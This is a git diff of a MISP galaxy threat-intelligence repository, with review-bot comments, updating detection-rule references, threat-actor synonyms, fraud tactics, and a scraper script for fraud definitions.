"tags": [
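Review bot: `"https://blogs.blackberry.com/"` in this `refs` array is a bare site root rather than a citation of a specific article, so it gives a reader nothing to follow; since the hunk already touches this list, replace it with the URL of the actual BlackBerry post the rule was derived from, or drop it.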
@@ -95161,9 +90112,9 @@
"logsource.category": "process_creation",
"logsource.product": "linux",
"refs": [
- "https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py",
- "https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html",
"https://github.com/apache/spark/pull/36315/files",
+ "https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html",
+ "https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml"
],
"tags": [
@@ -95230,8 +90181,8 @@
"logsource.category": "process_creation",
"logsource.product": "linux",
"refs": [
- "https://www.configserverfirewall.com/ubuntu-linux/ubuntu-add-user-to-root-group/",
"https://pberba.github.io/security/2021/11/23/linux-threat-hunting-for-persistence-account-creation-manipulation/",
+ "https://www.configserverfirewall.com/ubuntu-linux/ubuntu-add-user-to-root-group/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_usermod_susp_group.yml"
],
"tags": [
@@ -95309,5 +90260,5 @@
"value": "Security Software Discovery - Linux"
}
],
- "version": 20230420
+ "version": 20230511
}
diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json
index afb3922..871d273 100644
--- a/clusters/threat-actor.json
+++ b/clusters/threat-actor.json
@@ -5235,14 +5235,16 @@
"https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/",
"https://attack.mitre.org/groups/G0086/",
"https://us-cert.cisa.gov/ncas/alerts/aa20-301a",
- "https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite"
+ "https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite",
+ "https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report"
],
"synonyms": [
"Velvet Chollima",
"Black Banshee",
"Thallium",
"Operation Stolen Pencil",
- "G0086"
+ "G0086",
+ "APT43"
]
},
"related": [
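Review bot: adding `"APT43"` as a plain synonym of the Kimsuky cluster, together with the Mandiant report in `refs`, merges two vendor namings into a single entity; if the intent is to record overlap rather than identity, a separate APT43 cluster with a `related` entry to this one preserves the distinction and lets the galaxy express partial attribution. Please confirm the full merge is deliberate. The `https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report` link is a document-hosting asset URL; keeping a more durable Mandiant page next to it would help if that asset moves.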
diff --git a/galaxies/attck4fraud.json b/galaxies/attck4fraud.json
index a4aad0f..dd21acc 100644
--- a/galaxies/attck4fraud.json
+++ b/galaxies/attck4fraud.json
@@ -8,12 +8,13 @@
"Perform Fraud",
"Obtain Fraudulent Assets",
"Assets Transfer",
- "Monetisation"
+ "Monetisation",
+ "Due Diligence"
]
},
"name": "attck4fraud",
"namespace": "misp",
"type": "financial-fraud",
"uuid": "cc0c8ae9-aec2-42c6-9939-f4f82b051836",
- "version": 1
+ "version": 2
}
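Review bot: `"Due Diligence"` is appended to `kill_chain_order.fraud-tactics` after `"Monetisation"`, but `kill_chain_order` is an ordered list, so this places Due Diligence as the last phase of the fraud chain; if it is meant as a preparatory phase (the name suggests checks performed before a fraud is executed), it belongs earlier in the array. The bump to `"version": 2` is correct since the galaxy definition itself changed.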
diff --git a/tools/gen_360net.py b/tools/gen_360net.py
index 5d03562..cefcb5a 100755
--- a/tools/gen_360net.py
+++ b/tools/gen_360net.py
@@ -40,7 +40,7 @@ for actor in list_data['data']['list']:
refs = []
for ref in actor['recommends']:
refs.append(ref['url'])
- refs = list(set(refs))
+ refs = sorted(list(set(refs)))
cluster = {
'value': f"{actor['name']} - {actor['code']}",
'description': actor['description'],
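Review bot: `refs = sorted(list(set(refs)))` works, but the `list()` is redundant: `sorted()` accepts any iterable and always returns a new list, so `refs = sorted(set(refs))` is the idiomatic form. The deterministic ordering itself is a good change, since it removes the reorder-only churn that the Sigma cluster hunks in this same diff still suffer from.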
@@ -67,9 +67,9 @@ json_galaxy = {
'uuid': "20de4abf-f000-48ec-a929-3cdc5c2f3c23",
'version': 1
}
+
with open(os.path.join('..', 'clusters', '360net.json'), 'r') as f:
json_cluster = json.load(f)
-
json_cluster['values'] = clusters
json_cluster['version'] += 1
diff --git a/tools/gen_east_fraud.py b/tools/gen_east_fraud.py
new file mode 100644
index 0000000..b25e183
--- /dev/null
+++ b/tools/gen_east_fraud.py
@@ -0,0 +1,111 @@
+#!/usr/bin/env python3
+#
+# A simple convertor of the E.A.S.T. Fraud definitions to a MISP Galaxy datastructure.
+# https://www.association-secure-transactions.eu/industry-information/fraud-definitions/
+# Copyright (c) 2023 MISP Project
+#
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU Affero General Public License as
+# published by the Free Software Foundation, either version 3 of the
+# License, or (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU Affero General Public License for more details.
+#
+# You should have received a copy of the GNU Affero General Public License
+# along with this program. If not, see .
+
+from bs4 import BeautifulSoup
+import json
+import requests
+import string
+import uuid
+import os
+
+url = 'https://www.association-secure-transactions.eu/industry-information/fraud-definitions/'
+
+try:
+ response = requests.get(url, timeout=3)
+except Exception:
+ exit("ERROR: Could not download the webpage. Are you sure you have internet connectivity?")
+
+with open(os.path.join('..', 'galaxies', 'attck4fraud.json'), 'r') as f:
+ tactics_options = json.load(f)['kill_chain_order']['fraud-tactics']
+
+with open(os.path.join('..', 'clusters', 'attck4fraud.json'), 'r') as f:
+ json_data = json.load(f)
+# build value/synonym based mapping to UUID allowing us to lookup what exists
+mapping = {}
+for cluster in json_data['values']:
+ mapping[cluster['value'].lower()] = cluster['uuid']
+ try:
+ for synonym in cluster['meta']['synonyms']:
+ mapping[synonym.lower()] = cluster['uuid']
+ except KeyError:
+ pass
+
+changed = False
+soup = BeautifulSoup(response.content, 'lxml')
+entry_content = soup.find('div', class_='entry-content')
+t_first = entry_content.find('table')
+p_start = t_first.find_previous_sibling()
+for child in entry_content.children:
+ if 'p' == child.name and child.find('strong'):
+ # new category
+ category = string.capwords(child.text)
+ elif 'table' == child.name:
+ # new sub-category with entries to parse
+ sub_category = string.capwords(child.find('th').text.split('\n')[0])
+ # print(f'{category} - {sub_category}')
+ for tr in child.find_all('tr'):
+ try:
+ k, v = tr.find_all('td')
+ except ValueError:
+ continue # skip header row
+ value = k.text.strip()
+ description = v.text.strip()
+ # check by value or synonym if cluster is already known, and skip known
+ existing_uuid = mapping.get(value.lower())
+ if existing_uuid:
+ print(f'{category} # {sub_category} # {value} is already known as {existing_uuid}')
+ continue
+ # prompt as for a new cluster meta kill_chain is not known
+ print('Found new record:')
+ print(f' {category} # {sub_category} # {value} # {description}')
+ while True:
+ tactic = input(f'What is the right fraud-tactic? options are {tactics_options}\n> ')
+ if tactic.strip() in tactics_options:
+ tactic = tactic.strip()
+ break
+ elif any(option.startswith(tactic.strip()) for option in tactics_options):
+ for option in tactics_options:
+ if option.startswith(tactic.strip()):
+ tactic = option
+ print(f'Chosen: {tactic}')
+ found = True
+ break
+ break
+ else:
+ print("Given option is not in the list. Please input again.")
+
+ cluster = {
+ 'value': value,
+ 'description': description,
+ 'uuid': str(uuid.uuid5(uuid.UUID("9319371e-2504-4128-8410-3741cebbcfd3"), value)),
+ 'meta': {
+ 'refs': ['https://www.association-secure-transactions.eu/industry-information/fraud-definitions/'],
+ 'kill_chain': [f'fraud-tactics:{tactic}'],
+ }
+ }
+ json_data['values'].append(cluster)
+ changed = True
+
+if changed:
+ json_data['version'] += 1
+ with open(os.path.join('..', 'clusters', 'attck4fraud.json'), 'w') as f:
+ json.dump(json_data, f, indent=2, sort_keys=True, ensure_ascii=False)
+ f.write('\n')
+
+print("All done, please don't forget to ./jq_all_the_things.sh, commit, and then ./validate_all.sh.")
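Review bot: the HTTP response is never checked for success: the `try`/`except Exception` around `requests.get(url, timeout=3)` only catches transport failures, so a 4xx/5xx page is passed straight into `BeautifulSoup`, `soup.find('div', class_='entry-content')` returns `None`, and the script dies with an `AttributeError` at `entry_content.find('table')`; add `response.raise_for_status()` after the request and exit with a clear message (and prefer `sys.exit` over the site-module `exit`). Smaller points in the same file: `t_first` and `p_start` are computed but never used; `found = True` in the prefix-match branch is assigned but never read; `category` is only bound when a `<p><strong>` precedes the first `<table>`, so initialise it (or fail clearly) before the loop; the AGPL header ends in `If not, see .` with the licence URL missing; the comment `prompt as for a new cluster meta kill_chain is not known` needs rewording; and the literal in `'refs': ['https://www.association-secure-transactions.eu/...']` duplicates `url` and should reuse it. When a typed prefix matches several tactics, the first match wins silently; printing the candidates before choosing would avoid mis-assigning a kill-chain phase.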
diff --git a/validate_all.sh b/validate_all.sh
index ab9b473..0a4183b 100755
--- a/validate_all.sh
+++ b/validate_all.sh
@@ -85,5 +85,7 @@ do
echo ''
done
-# check for empyt strings in clusters
+# check for empty strings in clusters
python3 -m tools.chk_empty_strings
+
+echo "If you see this message, all is probably well."
\ No newline at end of file
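Review bot: the new `echo "If you see this message, all is probably well."` runs regardless of whether `python3 -m tools.chk_empty_strings` succeeded unless the script is under `set -e`, which this hunk does not show; either chain it on the exit status (`python3 -m tools.chk_empty_strings && echo ...`) or drop the claim so a failed check cannot print a success message. The hunk also drops the trailing newline (`\ No newline at end of file`); restore it. The `empyt` → `empty` comment fix is fine.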